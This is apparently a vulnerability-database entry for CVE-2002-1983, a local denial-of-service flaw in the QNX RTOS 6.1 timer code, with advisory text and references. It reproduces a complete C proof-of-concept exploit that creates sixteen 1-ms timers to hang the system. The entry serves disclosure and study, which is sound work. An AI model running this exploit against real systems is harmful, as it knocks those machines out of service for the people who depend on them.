QNX TimeCreate Local Denial of Service Vulnerability

Vulnerability ID: 1107080
Vulnerability type: Other
Published: 2002-11-06
Updated: 2005-10-20
CVE ID: CVE-2002-1983
CNNVD-ID: CNNVD-200212-479
Platform: Unix
CVSS score: 2.1
|Vulnerability Source
https://www.exploit-db.com/exploits/21984
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-479
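|Vulnerability Details
The timer implementation in QNX RTOS 6.1.0 contains a vulnerability. A local user can cause a denial of service (hang), and possibly execute arbitrary code, by creating multiple timers with a 1-ms tick.
|Exploit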
source: http://www.securityfocus.com/bid/6114/info

A denial of service vulnerability has been discovered in QNX.

It has been reported that it is possible for unprivileged users to cause QNX systems to stop responding, by creating multiple timers containing specific characteristics.

It should be noted that this issue was reported for QNX 6.1. It is not yet known whether this issue affects other releases.

/*
 * QNX RTP 6.1 Local DoS exploit
 *
 * author: Pawel Pisarczyk <[email protected]>, 2002
 *
 * After compilation and output binary execution system hangs.
 */
 
#include <errno.h>
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/neutrino.h>
#include <inttypes.h>


int main(int argc, char *argv[])
{
	struct sigevent event;
	struct _itimer itimer;
	int chid;
	int tmid;
	int coid;
	int k;
		

	/* Create a channel and attach to it so the timer pulses have a destination. */
	if ((chid = ChannelCreate(0)) < 0) {
		fprintf(stderr, "Can't create channel!\n");
		exit(-1);
	}
	
	if ((coid = ConnectAttach(0, getpid(), chid, 0, 0)) < 0) {
		fprintf(stderr, "Can't connect to channel!\n");
		exit(-1);
	}
	
	
	/* Create 16 timers, each delivering a priority-16 pulse every 1 ms. */
	for (k = 0; k < 16; k++) {
	
		SIGEV_PULSE_INIT(&event, coid, 16, _PULSE_CODE_MINAVAIL + 1, k);
		
		if ((tmid = TimerCreate(CLOCK_REALTIME, &event)) < 0) {
			fprintf(stderr, "Can't create timer!\n");
			return -1;
		}


		/* First expiry and repeat interval are both 1000000 ns (1 ms). */
		itimer.nsec = 1000000;
		itimer.interval_nsec = 1000000;
		TimerSettime(tmid, 0, &itimer, NULL);
	}
	
	
	while (getc(stdin) != '#');
	return 0;
}
|References

Source: XF
Name: qnx-rtp-timer-dos(10550)
Link: http://xforce.iss.net/xforce/xfdb/10550
Source: BID
Name: 6114
Link: http://www.securityfocus.com/bid/6114
Source: BUGTRAQ
Name: 20021106QNX6.1TimeCreateweakness
Link: http://online.securityfocus.com/archive/1/298689
